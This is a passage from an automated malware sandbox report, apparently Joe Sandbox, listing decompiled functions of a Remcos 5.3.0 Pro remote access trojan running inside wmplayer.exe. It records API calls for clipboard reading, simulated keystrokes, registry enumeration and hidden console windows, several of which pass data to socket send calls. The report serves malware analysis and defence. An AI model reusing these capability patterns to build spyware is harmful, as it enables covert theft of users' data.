                                                                                              • Part of subcall function 004334CF: EnterCriticalSection.KERNEL32(00470D18,00475D2C,?,0040AEAC,00475D2C,00456D97,?,00000000,00000000), ref: 004334D9
                                                                                              • Part of subcall function 004334CF: LeaveCriticalSection.KERNEL32(00470D18,?,0040AEAC,00475D2C,00456D97,?,00000000,00000000), ref: 0043350C
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: CriticalSection$EnterLeave$ExitHeaderInit_thread_footerThreadUnprepare__onexitwave
                                                                                            • String ID: T=G$p[G$>G$>G
                                                                                            • API String ID: 1596592924-2461731529
                                                                                            • Opcode ID: 7bd150d22899eca206633265e7980286f0d125ca65ed8114f89ceea82a31b6e2
                                                                                            • Instruction ID: b2aa677fe1363808454ef9d3704f93b9908b7cd688e3fd59dcdd6ad405d7ff49
                                                                                            • Opcode Fuzzy Hash: 7bd150d22899eca206633265e7980286f0d125ca65ed8114f89ceea82a31b6e2
                                                                                            • Instruction Fuzzy Hash: 0D41A0316042019BC324FB65DCA6EAE73A4EB94318F00453FF54AA71F2DF78A945C65E
                                                                                            Function 00406BE9 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 97fileCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000,00465454,?,?,00000000,00407273,00000000,?,0000000A,00000000), ref: 00406C38
                                                                                            • WriteFile.KERNEL32(00000000,?,00000000,?,00000000,?,000186A0,?,?,?,00000000,00407273,00000000,?,0000000A,00000000), ref: 00406C80
                                                                                              • Part of subcall function 00404468: send.WS2_32(00000270,00000000,00000000,00000000), ref: 004044FD
                                                                                            • CloseHandle.KERNEL32(00000000,?,?,00000000,00407273,00000000,?,0000000A,00000000,00000000), ref: 00406CC0
                                                                                            • MoveFileW.KERNEL32(00000000,00000000), ref: 00406CDD
                                                                                            • CloseHandle.KERNEL32(00000000,00000057,?,00000008,?,?,?,?,?,?,0000000A,00000000,00000000), ref: 00406D08
                                                                                            • DeleteFileW.KERNEL32(00000000,?,?,?,?,?,?,0000000A,00000000,00000000), ref: 00406D18
                                                                                              • Part of subcall function 0040455B: WaitForSingleObject.KERNEL32(?,000000FF,?,?,0040460E,00000000,?,?), ref: 0040456A
                                                                                              • Part of subcall function 0040455B: SetEvent.KERNEL32(?,?,?,0040460E,00000000,?,?), ref: 00404588
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: File$CloseHandle$CreateDeleteEventMoveObjectSingleWaitWritesend
                                                                                            • String ID: .part
                                                                                            • API String ID: 1303771098-3499674018
                                                                                            • Opcode ID: 98875dd672773ca9856db277106ed48cc003e9625aa19374f5a38d449972a537
                                                                                            • Instruction ID: a9f2b94bfe891e644ef5b97f564769cd4b441703f4f7d546a0b6aea2ef9939f1
                                                                                            • Opcode Fuzzy Hash: 98875dd672773ca9856db277106ed48cc003e9625aa19374f5a38d449972a537
                                                                                            • Instruction Fuzzy Hash: 1C31C2715083019FD210EF21DD459AFB7A8FB85715F40093FF9C6A21A1DB38AA48CB9A
                                                                                            Function 0041A81D Relevance: 12.3, APIs: 1, Strings: 6, Instructions: 90COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                              • Part of subcall function 00412584: RegOpenKeyExW.ADVAPI32(80000001,00000400,00000000,00020019,?), ref: 004125A6
                                                                                              • Part of subcall function 00412584: RegQueryValueExW.ADVAPI32(?,0040E0BA,00000000,00000000,?,00000400), ref: 004125C5
                                                                                              • Part of subcall function 00412584: RegCloseKey.ADVAPI32(?), ref: 004125CE
                                                                                              • Part of subcall function 0041B15B: GetCurrentProcess.KERNEL32(?,?,?,0040C914,WinDir,00000000,00000000), ref: 0041B16C
                                                                                              • Part of subcall function 0041B15B: IsWow64Process.KERNEL32(00000000,?,?,0040C914,WinDir,00000000,00000000), ref: 0041B173
                                                                                            • _wcslen.LIBCMT ref: 0041A8F6
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Process$CloseCurrentOpenQueryValueWow64_wcslen
                                                                                            • String ID: .exe$:@$XCG$http\shell\open\command$program files (x86)\$program files\
                                                                                            • API String ID: 3286818993-703403762
                                                                                            • Opcode ID: aa5f3d36ce9772210bd4ab0c541c77e8bdbd068386b6e6afd822d477f8b40dee
                                                                                            • Instruction ID: cf464564bb47d370653928ac6653466accee15d45f6204cdc17a1bec324f9b19
                                                                                            • Opcode Fuzzy Hash: aa5f3d36ce9772210bd4ab0c541c77e8bdbd068386b6e6afd822d477f8b40dee
                                                                                            • Instruction Fuzzy Hash: 3021B8727001043BDB04BAB58C96DEE366D9B85358F14083FF402F72C2ED3C9D5942A9
                                                                                            Function 0041BEB0 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 47memoryCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • AllocConsole.KERNEL32(00474358), ref: 0041BEB9
                                                                                            • GetConsoleWindow.KERNEL32 ref: 0041BEBF
                                                                                            • ShowWindow.USER32(00000000,00000000), ref: 0041BED2
                                                                                            • SetConsoleOutputCP.KERNEL32(000004E4), ref: 0041BEF7
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Console$Window$AllocOutputShow
                                                                                            • String ID: Remcos v$5.3.0 Pro$CONOUT$
                                                                                            • API String ID: 4067487056-2527699604
                                                                                            • Opcode ID: 665a097808b038229c9a37eafed355beb7ea993dcaa7ec452e19bba1328996a1
                                                                                            • Instruction ID: 482f1cdaf256b8236abc94a0b12de3dc55517b66349f776fa4240982defd8f75
                                                                                            • Opcode Fuzzy Hash: 665a097808b038229c9a37eafed355beb7ea993dcaa7ec452e19bba1328996a1
                                                                                            • Instruction Fuzzy Hash: 180171B19803047BD600FBF29D4BFDD37AC9B14705F5004277644E7093EABCA554866D
                                                                                            Function 00449950 Relevance: 12.2, APIs: 8, Instructions: 216COMMONLIBRARYCODE
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,0043D564,0043D564,?,?,?,00449BA1,00000001,00000001,1AE85006), ref: 004499AA
                                                                                            • __alloca_probe_16.LIBCMT ref: 004499E2
                                                                                            • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00449BA1,00000001,00000001,1AE85006,?,?,?), ref: 00449A30
                                                                                            • __alloca_probe_16.LIBCMT ref: 00449AC7
                                                                                            • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,1AE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00449B2A
                                                                                            • __freea.LIBCMT ref: 00449B37
                                                                                              • Part of subcall function 00446AFF: RtlAllocateHeap.NTDLL(00000000,00434403,?,?,00437227,?,?,?,?,?,0040CC87,00434403,?,?,?,?), ref: 00446B31
                                                                                            • __freea.LIBCMT ref: 00449B40
                                                                                            • __freea.LIBCMT ref: 00449B65
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
                                                                                            • String ID:
                                                                                            • API String ID: 3864826663-0
                                                                                            • Opcode ID: 352025556551dac2c37919268567461b7de28f4f732b96d5dc4c3903fd0b0184
                                                                                            • Instruction ID: d3450b84a68f20df6837e20b70452335b33749c243a385fd48b45426a0ff81fe
                                                                                            • Opcode Fuzzy Hash: 352025556551dac2c37919268567461b7de28f4f732b96d5dc4c3903fd0b0184
                                                                                            • Instruction Fuzzy Hash: 89511572610246AFFB258F65DC81EBB77A9EB44754F15462EFC04E6240EF38EC40E668
                                                                                            Function 00418ABE Relevance: 12.1, APIs: 8, Instructions: 117keyboardCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • SendInput.USER32 ref: 00418B08
                                                                                            • SendInput.USER32(00000001,?,0000001C), ref: 00418B30
                                                                                            • SendInput.USER32(00000001,0000001C,0000001C), ref: 00418B57
                                                                                            • SendInput.USER32(00000001,0000001C,0000001C), ref: 00418B75
                                                                                            • SendInput.USER32(00000001,0000001C,0000001C), ref: 00418B95
                                                                                            • SendInput.USER32(00000001,0000001C,0000001C), ref: 00418BBA
                                                                                            • SendInput.USER32(00000001,0000001C,0000001C), ref: 00418BDC
                                                                                            • SendInput.USER32(00000001,?,0000001C), ref: 00418BFF
                                                                                              • Part of subcall function 00418AB1: MapVirtualKeyA.USER32(00000000,00000000), ref: 00418AB7
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: InputSend$Virtual
                                                                                            • String ID:
                                                                                            • API String ID: 1167301434-0
                                                                                            • Opcode ID: 88f93acc81d4616b4190e12117d1b14dafb1e9928c91053c24dee7c09840eeb6
                                                                                            • Instruction ID: ee8b26819532887277ba411a2a2a0296f2420856d0f10470abe43a11d9a37015
                                                                                            • Opcode Fuzzy Hash: 88f93acc81d4616b4190e12117d1b14dafb1e9928c91053c24dee7c09840eeb6
                                                                                            • Instruction Fuzzy Hash: 3231A471248345AAE210DF65D841FDFFBECAFC5B44F04080FB98457291DAA4D98C87AB
                                                                                            Function 00415A45 Relevance: 12.0, APIs: 8, Instructions: 46clipboardCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • OpenClipboard.USER32 ref: 00415A46
                                                                                            • EmptyClipboard.USER32 ref: 00415A54
                                                                                            • CloseClipboard.USER32 ref: 00415A5A
                                                                                            • OpenClipboard.USER32 ref: 00415A61
                                                                                            • GetClipboardData.USER32(0000000D), ref: 00415A71
                                                                                            • GlobalLock.KERNEL32(00000000), ref: 00415A7A
                                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 00415A83
                                                                                            • CloseClipboard.USER32 ref: 00415A89
                                                                                              • Part of subcall function 00404468: send.WS2_32(00000270,00000000,00000000,00000000), ref: 004044FD
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Clipboard$CloseGlobalOpen$DataEmptyLockUnlocksend
                                                                                            • String ID:
                                                                                            • API String ID: 2172192267-0
                                                                                            • Opcode ID: aaa85fb431374b74e5b3230706668e782439e027beb02df1b6a3a4d771b327f5
                                                                                            • Instruction ID: 9b100a12d13cc6c4196ee8fc3e520842cce62831b2d72284ea91ff5550736cd9
                                                                                            • Opcode Fuzzy Hash: aaa85fb431374b74e5b3230706668e782439e027beb02df1b6a3a4d771b327f5
                                                                                            • Instruction Fuzzy Hash: A10152312083009FC314BB75EC5AAEE77A5AFC0762F41457EFD06861A2DF38C845D65A
                                                                                            Function 00447E3A Relevance: 10.9, APIs: 7, Instructions: 370timeCOMMONLIBRARYCODE
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • _free.LIBCMT ref: 00447EBC
                                                                                            • _free.LIBCMT ref: 00447EE0
                                                                                            • _free.LIBCMT ref: 00448067
                                                                                            • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045D478), ref: 00448079
                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,0047179C,000000FF,00000000,0000003F,00000000,?,?), ref: 004480F1
                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,004717F0,000000FF,?,0000003F,00000000,?), ref: 0044811E
                                                                                            • _free.LIBCMT ref: 00448233
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: _free$ByteCharMultiWide$InformationTimeZone
                                                                                            • String ID:
                                                                                            • API String ID: 314583886-0
                                                                                            • Opcode ID: 0db77cb6a5e89d3bc4573ca623af4d9606dd509ec69084a3c4c6f4a44b83d65d
                                                                                            • Instruction ID: d74e55ca02e924b9256a88f94e7be2aa31ce1fd8fbfcff02d88bcfbefc6cbd9d
                                                                                            • Opcode Fuzzy Hash: 0db77cb6a5e89d3bc4573ca623af4d9606dd509ec69084a3c4c6f4a44b83d65d
                                                                                            • Instruction Fuzzy Hash: 32C12871904205ABFB24DF799C41AAE7BB8EF46314F2441AFE484A7351EB388E47C758
                                                                                            Function 0044F806 Relevance: 10.7, APIs: 7, Instructions: 204COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: _free
                                                                                            • String ID:
                                                                                            • API String ID: 269201875-0
                                                                                            • Opcode ID: 154a0d9c569a12efbd1fb523a4d55ce0e4318de2d30962be95ff360cd9ef53d7
                                                                                            • Instruction ID: 5fecc71d39e6a90402c47f7728bb4f6831cdfeb90858b0dfc168023e2edb8b83
                                                                                            • Opcode Fuzzy Hash: 154a0d9c569a12efbd1fb523a4d55ce0e4318de2d30962be95ff360cd9ef53d7
                                                                                            • Instruction Fuzzy Hash: 2361BFB1900205AFEB20DF69C841BAABBF4EB45720F24417BE944FB392E7349D45CB59
                                                                                            Function 00443F7B Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 187COMMONLIBRARYCODE
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                              • Part of subcall function 00446AFF: RtlAllocateHeap.NTDLL(00000000,00434403,?,?,00437227,?,?,?,?,?,0040CC87,00434403,?,?,?,?), ref: 00446B31
                                                                                            • _free.LIBCMT ref: 00444086
                                                                                            • _free.LIBCMT ref: 0044409D
                                                                                            • _free.LIBCMT ref: 004440BC
                                                                                            • _free.LIBCMT ref: 004440D7
                                                                                            • _free.LIBCMT ref: 004440EE
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: _free$AllocateHeap
                                                                                            • String ID: J7D
                                                                                            • API String ID: 3033488037-1677391033
                                                                                            • Opcode ID: 7bd75c35ecc30b271b00b77e92f4063212cf76abbfff81b413b55d476d69b5fb
                                                                                            • Instruction ID: b5a2c1f2d034459fb850ff781f480331835685433a1d37f27cfcf8091ebf3f31
                                                                                            • Opcode Fuzzy Hash: 7bd75c35ecc30b271b00b77e92f4063212cf76abbfff81b413b55d476d69b5fb
                                                                                            • Instruction Fuzzy Hash: 9251E371A00604AFEB20DF6AC841B6AB3F4EF95724F14416EE909D7251E739ED15CB88
                                                                                            Function 0044A0C3 Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMONLIBRARYCODE
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetConsoleCP.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,0044A838,?,00000000,00000000,00000000,00000000,0000000C), ref: 0044A105
                                                                                            • __fassign.LIBCMT ref: 0044A180
                                                                                            • __fassign.LIBCMT ref: 0044A19B
                                                                                            • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,00000000,00000005,00000000,00000000), ref: 0044A1C1
                                                                                            • WriteFile.KERNEL32(?,00000000,00000000,0044A838,00000000,?,?,?,?,?,?,?,?,?,0044A838,?), ref: 0044A1E0
                                                                                            • WriteFile.KERNEL32(?,?,00000001,0044A838,00000000,?,?,?,?,?,?,?,?,?,0044A838,?), ref: 0044A219
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                            • String ID:
                                                                                            • API String ID: 1324828854-0
                                                                                            • Opcode ID: c2a57007ecaabeafdb2dea6b541a07f99f491d21749d301156e70ae2fc22959b
                                                                                            • Instruction ID: b40464c9ec282996611fef5cbd20273031f87559cdf671a411eba52403cbf28d
                                                                                            • Opcode Fuzzy Hash: c2a57007ecaabeafdb2dea6b541a07f99f491d21749d301156e70ae2fc22959b
                                                                                            • Instruction Fuzzy Hash: DB51E270E002099FEB10CFA8D881AEEBBF8FF09300F14416BE815E3391D6749951CB6A
                                                                                            Function 004559CA Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 152COMMONLIBRARYCODE
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: _free
                                                                                            • String ID: HE$HE
                                                                                            • API String ID: 269201875-1978648262
                                                                                            • Opcode ID: fc29a47a32afb3350fc3e3c96543f328580f9b5143c0f3ce58bfce5294a38304
                                                                                            • Instruction ID: 4134de32792d44acead4bb36f8da9b5b282593f8ffe10db144b1eaf4d9577b64
                                                                                            • Opcode Fuzzy Hash: fc29a47a32afb3350fc3e3c96543f328580f9b5143c0f3ce58bfce5294a38304
                                                                                            • Instruction Fuzzy Hash: 90412A31A009106BEF24AABA8CD5A7F3B64DF45375F14031BFC1896293D67C8C4996AA
                                                                                            Function 10009492 Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,10009C07,?,00000000,?,00000000,00000000), ref: 100094D4
                                                                                            • __fassign.LIBCMT ref: 1000954F
                                                                                            • __fassign.LIBCMT ref: 1000956A
                                                                                            • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 10009590
                                                                                            • WriteFile.KERNEL32(?,?,00000000,10009C07,00000000,?,?,?,?,?,?,?,?,?,10009C07,?), ref: 100095AF
                                                                                            • WriteFile.KERNEL32(?,?,00000001,10009C07,00000000,?,?,?,?,?,?,?,?,?,10009C07,?), ref: 100095E8
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4571892049.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4571861777.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000006.00000002.4571892049.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_10000000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                            • String ID:
                                                                                            • API String ID: 1324828854-0
                                                                                            • Opcode ID: c8cde1f94c5a3c187481f919a86e285046f284bf183baf255f965bcae4dd5098
                                                                                            • Instruction ID: 7b1e32e7ca62d622bc6abd4954a79b3a1191cf35157f5551c2bc05612337e78d
                                                                                            • Opcode Fuzzy Hash: c8cde1f94c5a3c187481f919a86e285046f284bf183baf255f965bcae4dd5098
                                                                                            • Instruction Fuzzy Hash: D7519271D00249AFEB10CFA4CC95BDEBBF8EF09350F15811AE955E7295D731AA41CB60
                                                                                            Function 00412C88 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 135registryCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • RegOpenKeyExW.ADVAPI32(00000000,00000000,00000000,00020019,?), ref: 00412CC1
                                                                                              • Part of subcall function 004129AA: RegQueryInfoKeyW.ADVAPI32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00412A1D
                                                                                              • Part of subcall function 004129AA: RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?,?,?,?,00000000,?,?,?,?), ref: 00412A4C
                                                                                              • Part of subcall function 00404468: send.WS2_32(00000270,00000000,00000000,00000000), ref: 004044FD
                                                                                            • RegCloseKey.ADVAPI32(TUFTUF,00465554,00465554,00465900,00465900,00000071), ref: 00412E31
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: CloseEnumInfoOpenQuerysend
                                                                                            • String ID: TUFTUF$>G$DG$DG
                                                                                            • API String ID: 3114080316-344394840
                                                                                            • Opcode ID: c3719a5ed271eeb77feb060549d62eb8684634a1434435233477e5bb1b94a9bb
                                                                                            • Instruction ID: 92049c6ae7fba3f13a57cd60a3827c89810429dfa6cf24b756c0ab1f01d338b1
                                                                                            • Opcode Fuzzy Hash: c3719a5ed271eeb77feb060549d62eb8684634a1434435233477e5bb1b94a9bb
                                                                                            • Instruction Fuzzy Hash: 0141A2316042009BC224F635D9A2AEF7394AFD0708F50843FF94A671E2EF7C5D4986AE
                                                                                            Function 00437A80 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 117COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • _ValidateLocalCookies.LIBCMT ref: 00437AAB
                                                                                            • ___except_validate_context_record.LIBVCRUNTIME ref: 00437AB3
                                                                                            • _ValidateLocalCookies.LIBCMT ref: 00437B41
                                                                                            • __IsNonwritableInCurrentImage.LIBCMT ref: 00437B6C
                                                                                            • _ValidateLocalCookies.LIBCMT ref: 00437BC1
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                            • String ID: csm
                                                                                            • API String ID: 1170836740-1018135373
                                                                                            • Opcode ID: a717e1e029c36c18052b78818950a58a3847fd0af0d72a643a188b4f53f37093
                                                                                            • Instruction ID: 9404c61c081bc4e6da2099be8a52027e1297fde76841380def533d3eaa533744
                                                                                            • Opcode Fuzzy Hash: a717e1e029c36c18052b78818950a58a3847fd0af0d72a643a188b4f53f37093
                                                                                            • Instruction Fuzzy Hash: CD410970A04209DBCF20EF19C844A9FBBB5AF0932CF14915BE8556B392D739EE05CB95
                                                                                            Function 10003370 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 117COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • _ValidateLocalCookies.LIBCMT ref: 1000339B
                                                                                            • ___except_validate_context_record.LIBVCRUNTIME ref: 100033A3
                                                                                            • _ValidateLocalCookies.LIBCMT ref: 10003431
                                                                                            • __IsNonwritableInCurrentImage.LIBCMT ref: 1000345C
                                                                                            • _ValidateLocalCookies.LIBCMT ref: 100034B1
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4571892049.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4571861777.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000006.00000002.4571892049.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_10000000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                            • String ID: csm
                                                                                            • API String ID: 1170836740-1018135373
                                                                                            • Opcode ID: 314e045d64bd9dff90e147ebc0021a06731dbc25050b3dab86f6a1545ce1a07e
                                                                                            • Instruction ID: 0a936c430148d26a69835db3fa9f683d01d5328c1142e13f0191aacd949c771e
